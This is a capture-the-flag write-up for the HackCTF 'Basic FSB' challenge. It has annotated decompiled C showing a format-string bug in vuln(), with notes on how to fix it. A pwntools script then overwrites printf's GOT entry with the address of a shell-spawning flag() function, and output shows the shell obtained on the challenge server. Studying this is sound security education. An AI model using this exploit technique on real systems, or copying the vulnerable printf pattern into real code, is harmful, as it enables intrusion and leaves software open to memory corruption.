
HackCTF Basic FSB

Basic FSB

Source

/*
 * flag() -- decompiler output for the challenge's "win" routine.
 *
 * Prints two messages and then starts /bin/sh via system(), returning
 * system()'s result. Nothing in the listing shown here calls it: main()
 * only calls vuln(). It therefore runs only if control flow is redirected
 * into it.
 */
int flag()
{
  puts("EN)you have successfully modified the value :)");
  // aKr is a decompiler-generated name for a string in the binary;
  // presumably the "KR)..." line seen in the program output -- confirm in the binary.
  puts(aKr);
  // Spawns a shell with the privileges of the service process.
  return system("/bin/sh");
}

/*
 * vuln() -- decompiler output for the routine containing the format-string
 * bug (CWE-134, CERT FIO30-C).
 *
 * Reads one line from stdin and then passes caller-controlled text as the
 * *format* argument to two printf-family calls. Returns printf()'s result.
 *
 * The read itself is bounded (fgets with the buffer size), so the defect is
 * not an overflow of s; it is that input is interpreted as a format string.
 * The fix is to pass input as data only:
 *     snprintf(&format, 0x400u, "%s", s);
 *     printf("%s", &format);      // or fputs(&format, stdout)
 * Building with -Wformat -Wformat-security (and -Werror=format-security)
 * reports both calls at compile time.
 */
int vuln()
{
  // Raw user input, 1024 bytes.
  char s[1024]; // [esp+0h] [ebp-808h]
  // Shown as a single char by the decompiler, but the stack offsets place it
  // 0x400 bytes after s and snprintf is given a size of 0x400, so it is used
  // as a 0x400-byte buffer.
  char format; // [esp+400h] [ebp-408h]

  printf("input : ");
  // Bounded read: at most 1023 bytes plus the terminator are stored in s.
  fgets(s, 1024, stdin);
  // BUG: s is the format argument. Conversion specifiers typed by the user
  // are interpreted, including %n, which stores to memory through a pointer
  // taken from the argument area. No variadic arguments are supplied.
  snprintf(&format, 0x400u, s);
  // BUG: the expanded text is again used as a format string, so any
  // specifier that survives the first expansion is interpreted a second time.
  return printf(&format);
}

/*
 * main() -- decompiler output for the program entry point.
 *
 * Switches stdout to unbuffered mode, calls vuln() once and returns 0.
 * argc/argv/envp are not used.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  // Mode 2 is _IONBF on glibc: stdout is unbuffered, presumably so the
  // prompt reaches a remote client without waiting for a flush.
  setvbuf(stdout, 0, 2, 0);
  vuln();
  return 0;
}

Solve

from pwn import *

# Parse the local copy of the challenge binary so addresses can be read from it.
e = ELF("./basic_fsb")
#p = process("./basic_fsb")
# Connection to the author's CTF challenge service.
r = remote("ctf.j0n9hyun.xyz", 3002)
# Address of printf's GOT slot as recorded in the ELF. The checksec output for
# this binary reports Partial RELRO, which leaves this slot writable at run
# time; linking with Full RELRO (-Wl,-z,relro,-z,now) makes the GOT read-only.
printf_got = e.got['printf']
# Hard-coded address; presumably flag() in this non-PIE build -- confirm
# against the binary. With PIE + ASLR a fixed address like this is not stable.
flag = 0x80485b4
# Format-string argument index handed to fmtstr_payload (author's value).
offset = 2

payload = ''
# pwntools helper: builds the format-string input for the {address: value} map.
payload += fmtstr_payload(offset, {printf_got:flag})

# Send the line that vuln() reads with fgets, then attach the terminal to the session.
r.sendline(payload)
r.interactive()
  hackctf python basic_fsb.py
[*] '/home/ubuntu/ctf/hackctf/basic_fsb'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Opening connection to ctf.j0n9hyun.xyz on port 3002: Done
[*] Switching to interactive mode
input : EN)you have successfully modified the value :)
KR)#값조작 #성공적 #플래그 #FSB :)
$ id
uid=1000(attack) gid=1000(attack) groups=1000(attack)
This post is licensed under CC BY 4.0 by the author.